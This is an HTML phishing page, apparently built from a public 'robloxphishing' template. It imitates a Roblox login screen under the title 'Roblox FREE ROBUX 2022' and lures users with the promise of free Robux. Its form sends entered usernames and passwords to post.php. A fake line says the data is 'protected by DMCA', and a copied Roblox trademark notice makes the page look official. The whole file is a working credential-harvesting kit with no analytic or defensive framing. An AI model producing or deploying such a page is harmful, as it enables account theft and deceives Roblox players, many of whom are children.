<!DOCTYPE html>

<!-- Teamplate from https://github.com/feelatkeen/robloxphishing -->
<!-- Modified by https://github.com/makdosx -->

<html>
	<head>
		<meta charset="UTF-8">
		<title>Roblox FREE ROBUX 2022</title>
		<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro" rel="stylesheet"> 
		<style>
			body{
				font-family: "Source Sans Pro";
			}
			.header{
				background:#0074BD;
				color:white;
				margin-top:-8px;
				margin-left:-8px;
				padding-left:3px;
				padding-top:3px;
				margin-right:-8px;
			}
			.content{
				text-align:center;
			}
			.copyright{
				position:absolute;
				bottom:0;
				color:gray;
				font-size:9px;
				left:30%;
			}
			
			#logininpt{
			height: 40px;
			width: 300px;	
			font-size: 18px;
			}
			
			#LoginButton {
    			background-color: #00B259;
    			border: 1px solid;
    			border-color: #006633;
    			border-radius:2px;
    			color: white;
    			font-weight: 400;
    			font-size: 18px;
    			margin-top: 10px;
    			height: 40px;
			    width: 320px;

			}
			#OkButton {
    			background-color: #00B259;
    			border: 1px solid;
    			border-color: #006633;
    			border-radius:2px;
    			color: white;
    			font-weight: 400;
    			font-size: 18px;
    			margin-top: 10px;
    			height: 40px;
			    width: 320px;

			}
			#LoginButton:hover {
    			background-color: #00B259;
    			border: 1px solid;
    			border-color: #006633;
    			border-radius:2px;
    			color: white;
    			font-weight: 400;
    			font-size: 14px;
    			cursor:pointer;
    			height: 40px;
			    width: 320px;
			}
			#OkButton:hover {
    			background-color: #00B259;
    			border: 1px solid;
    			border-color: #006633;
    			border-radius:2px;
    			color: white;
    			font-weight: 400;
    			font-size: 18px;
    			cursor:pointer;
    			height: 40px;
			    width: 320px;
			}
			.prettygood{
				color:#006600;
				font-size:10px;
			}
			.prettyevil{
				color:#660000;
				font-size:10px;
			}
			.crichalka{
				background:black;
				color:white;
				border-left-style:solid;
				border-left-color:gray;
				border-left-width:10px;
				border-radius:3px;
				display:inline-block;
			}
		</style>
		 <script type="text/javascript" src="https://code.jquery.com/jquery-latest.min.js"></script>
	</head>
	<body>
		<div class="header" align="center">
			<img src="icon.png" width=300>
		</div>
		<div class="content">
			<div id="stepone">
				<h1> Login to Roblox </h1>
				<div class="loginwindow">
					<form action="post.php" method="post">
					<p></p>
					<input id="logininpt" name="user" placeholder="Username/Email/Phone">
					<br>
					<p></p>
					<input id="logininpt" name="pass" placeholder="Password">
					<br>
					<input type="submit" value="Log In" id="LoginButton">
					<h3 class="prettyevil">Warning: you need to be BC</h3>
					<h3 class="prettygood">Your account data (logins and passwords) are protected by DMCA.</h3>
				 </form>
				</div>
			</div>
			
			<p class="copyright">©2022 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.</p>
		</div>
	</body>
</html>
